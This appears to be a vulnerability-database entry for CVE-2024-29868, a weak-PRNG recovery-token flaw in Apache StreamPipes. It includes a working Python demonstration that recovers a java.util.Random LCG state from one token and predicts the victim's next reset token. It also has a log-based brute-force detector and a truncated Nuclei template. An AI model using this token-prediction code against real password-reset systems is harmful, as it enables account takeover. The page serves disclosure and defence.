CVE-2024-29868
Published 2024-06-24. CVE-2024-29868: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism.
Priority: P2 66 · Severity: critical · CVSS 3.1 base score 9.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
EPSS: 6.00% (92.4th percentile)
Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism.
This allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account.
This issue affects Apache StreamPipes: from 0.69.0 through 0.93.0.
Users are recommended to upgrade to version 0.95.0, which fixes the issue.
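What "cryptographically weak PRNG" means in practice for a recovery token, as an added example that is not StreamPipes code and not taken from the advisory: the advisory does not say which generator the project used or how the token was built, so the block assumes the classic CWE-338 shape, a token assembled from raw outputs of a linear congruential generator (here a re-implementation of java.util.Random's 48-bit LCG). An attacker who requests a reset for an account they control sees one token, recovers the generator's internal state from it with at most 65,536 trials, and can then name the token the server hands to the next reset request, the victim's. The "fix" side draws the token from the OS CSPRNG instead.

```python
"""CWE-338 in a password-recovery flow: tokens from a non-cryptographic PRNG are
predictable once an attacker has seen one of them. JavaRandom below re-implements
java.util.Random's 48-bit LCG (the attack applies to any LCG-based generator);
the token layout is an assumption for illustration, not StreamPipes code."""
import secrets

MASK48 = (1 << 48) - 1
MULT = 0x5DEECE66D
INC = 0xB


class JavaRandom:
    """java.util.Random: state' = (state * MULT + INC) mod 2^48, output = top 32 bits."""

    def __init__(self, seed: int):
        self.seed = (seed ^ MULT) & MASK48

    @classmethod
    def from_state(cls, state: int) -> "JavaRandom":
        rng = cls.__new__(cls)
        rng.seed = state & MASK48
        return rng

    def next_int(self) -> int:
        self.seed = (self.seed * MULT + INC) & MASK48
        val = self.seed >> 16                              # bits 16..47 of the state
        return val - (1 << 32) if val >= (1 << 31) else val  # Java int is signed


def weak_token(rng: JavaRandom) -> str:
    """24 hex chars from three nextInt() calls: looks like 96 random bits, is not."""
    return "".join(f"{rng.next_int() & 0xFFFFFFFF:08x}" for _ in range(3))


def strong_token() -> str:
    """The fix: 256 bits from the OS CSPRNG; earlier tokens reveal nothing about it."""
    return secrets.token_urlsafe(32)


def recover_state(o1: int, o2: int, o3: int):
    """Recover the LCG state from three consecutive 32-bit outputs.

    o1 is literally bits 16..47 of the state after the first call, so only the
    low 16 bits are unknown: 65,536 candidates. o2 picks the right one and o3
    rules out the rare false match. Returns a JavaRandom positioned right after
    o3, i.e. in lockstep with the server, or None if the outputs do not fit.
    """
    hi = (o1 & 0xFFFFFFFF) << 16
    for lo in range(1 << 16):
        s1 = hi | lo
        s2 = (s1 * MULT + INC) & MASK48
        if s2 >> 16 != (o2 & 0xFFFFFFFF):
            continue
        s3 = (s2 * MULT + INC) & MASK48
        if s3 >> 16 == (o3 & 0xFFFFFFFF):
            return JavaRandom.from_state(s3)
    return None


def predict_next_token(observed: str):
    """Attacker side: read the token issued to your own account, then produce the
    token the server will issue on the very next reset request (the victim's)."""
    outs = [int(observed[i:i + 8], 16) for i in (0, 8, 16)]
    rng = recover_state(*outs)
    return weak_token(rng) if rng else None


if __name__ == "__main__":
    server_rng = JavaRandom(0xC0FFEE)   # the server's seed is never seen by the attacker
    mine = weak_token(server_rng)       # recovery token for the attacker's own account
    victim = weak_token(server_rng)     # the token issued to the victim next
    print("predicted:", predict_next_token(mine), "actual:", victim)
    print("CSPRNG token:", strong_token())
```

The sanity check `JavaRandom(42).next_int() == -1170105035` matches what the JVM returns for `new Random(42).nextInt()`, so the predictor is exercising the real algorithm, not a toy. Note that hashing or base64-encoding the LCG output does not help: the attacker can run the same encoding over each candidate state. Only a generator whose state cannot be inferred from its output, i.e. a CSPRNG such as `java.security.SecureRandom` or Python's `secrets`, closes the hole.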
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | streampipes | 0.69.0 – 0.93.0 | 0.95.0 |
| apache_software_foundation | apache_streampipes | 0.69.0 – 0.93.0 | 0.95.0 |
Detection & IOCs (extracted from sources)
- Vulnerable versions of Apache StreamPipes span 0.69.0 through 0.93.0; any deployment in this range is susceptible to token-guessing attacks against the user self-registration and password recovery endpoints.
- The attack targets the user self-registration and password recovery mechanism; monitor for abnormally high or rapid request volumes to the password-reset and token-validation endpoints, which may indicate brute-force token guessing.
- The fix is only present in version 0.95.0 and later; versions 0.69.0–0.93.0 are confirmed vulnerable. Version 0.94.0 is not explicitly listed as patched, so treat it as potentially vulnerable until confirmed otherwise.
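One way to act on the second point above, as an added example rather than a rule from any of the indexed sources: a sliding-window counter over reverse-proxy access logs that flags client IPs hammering the recovery endpoints. The log lines are constructed for the example, and the `/api/v2/restore-password` and `/api/v2/reset-password` paths are placeholders, since the advisory does not name the real routes; point `RESET_PATH` at whatever your proxy shows for the reset and token-validation calls.

```python
"""Hunting for recovery-token brute force in access logs: count hits on the
password-reset / token-validation paths per client IP inside a sliding window
and report the sources that exceed a threshold. Log lines are constructed for
this example and the endpoint paths are placeholders; this is not StreamPipes
code or a rule shipped with it."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Placeholder route prefixes for the recovery flow (assumption; the advisory
# names none). Replace with the real reset / token-validation routes.
RESET_PATH = re.compile(r"^/api/v2/(?:restore-password|reset-password)(?:/|\?|$)")

# Combined log format as emitted by nginx / Apache httpd in front of the app.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None for lines that do not parse."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT),
            m["method"], m["path"], int(m["status"]))


def find_token_bruteforce(lines, window=timedelta(minutes=5), threshold=20,
                          failed_only=False):
    """Map each offending client IP to the peak number of reset-endpoint requests
    it made inside any `window`-long span. With failed_only=True only non-2xx
    responses are counted, which keeps a legitimate single-use reset out of the
    count when the application answers invalid tokens with a 4xx."""
    recent = defaultdict(deque)   # per-IP timestamps still inside the window
    offenders = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, _method, path, status = rec
        if not RESET_PATH.match(path):
            continue
        if failed_only and 200 <= status < 300:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:     # evict hits that fell out of the window
            q.popleft()
        if len(q) > threshold:
            offenders[ip] = max(offenders.get(ip, 0), len(q))
    return offenders


def sample_log():
    """Constructed access log: one legitimate reset, one unrelated call, one junk
    line, then a burst of 30 rejected guesses in a minute from a single source."""
    base = datetime(2024, 6, 24, 12, 0, tzinfo=timezone.utc)

    def entry(ip, offset_s, path, status):
        ts = (base + timedelta(seconds=offset_s)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "POST {path} HTTP/1.1" {status} 42'

    lines = [entry("198.51.100.4", 0, "/api/v2/restore-password/3f9a1c", 200),
             entry("198.51.100.4", 30, "/api/v2/user/profile", 200),
             "garbage line that does not parse"]
    lines += [entry("203.0.113.7", 60 + 2 * i, f"/api/v2/restore-password/{i:024x}", 401)
              for i in range(30)]
    return lines


if __name__ == "__main__":
    for ip, peak in find_token_bruteforce(sample_log()).items():
        print(f"possible recovery-token brute force from {ip}: {peak} hits within 5 min")
```

The threshold is deliberately low: a real user triggers a reset once and follows one link, so more than a handful of hits on these routes from one source in five minutes is already anomalous. Where the attacker spreads guesses across many source IPs, aggregate on the targeted account (the path or body parameter carrying the username) instead of the client address.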
GHSA
Apache StreamPipes: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Recovery Token Generation
ghsa · 2024-06-24 · CVE-2024-29868 [CRITICAL] · CWE-338
OSV
Apache StreamPipes: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Recovery Token Generation
osv · 2024-06-24 · CVE-2024-29868 [CRITICAL]
No detection rules found.
Nuclei
Apache StreamPipes <= 0.93.0 - Use of Cryptographically Weak PRNG in Recovery Token Generation
nuclei · CVSS 9.1 · CVE-2024-29868 [CRITICAL]
Template body (only the trailing version-check DSL and the signed digest survived extraction):
```yaml
= 0.69.0') && compare_versions(version, '<= 0.93.0')"
condition: and
# digest: 490a004630440220285331b08fd85a845a07809bd60d5697c9707ddc9e3596fdfbb73a11df5e3be9022053de1458ebd3ec316986d4905321063ac8acc547279292a9dc33217eff886af6:922c64590222798bb761d5b6d8e72950
```
No writeups or analysis indexed.
Published: 2024-06-24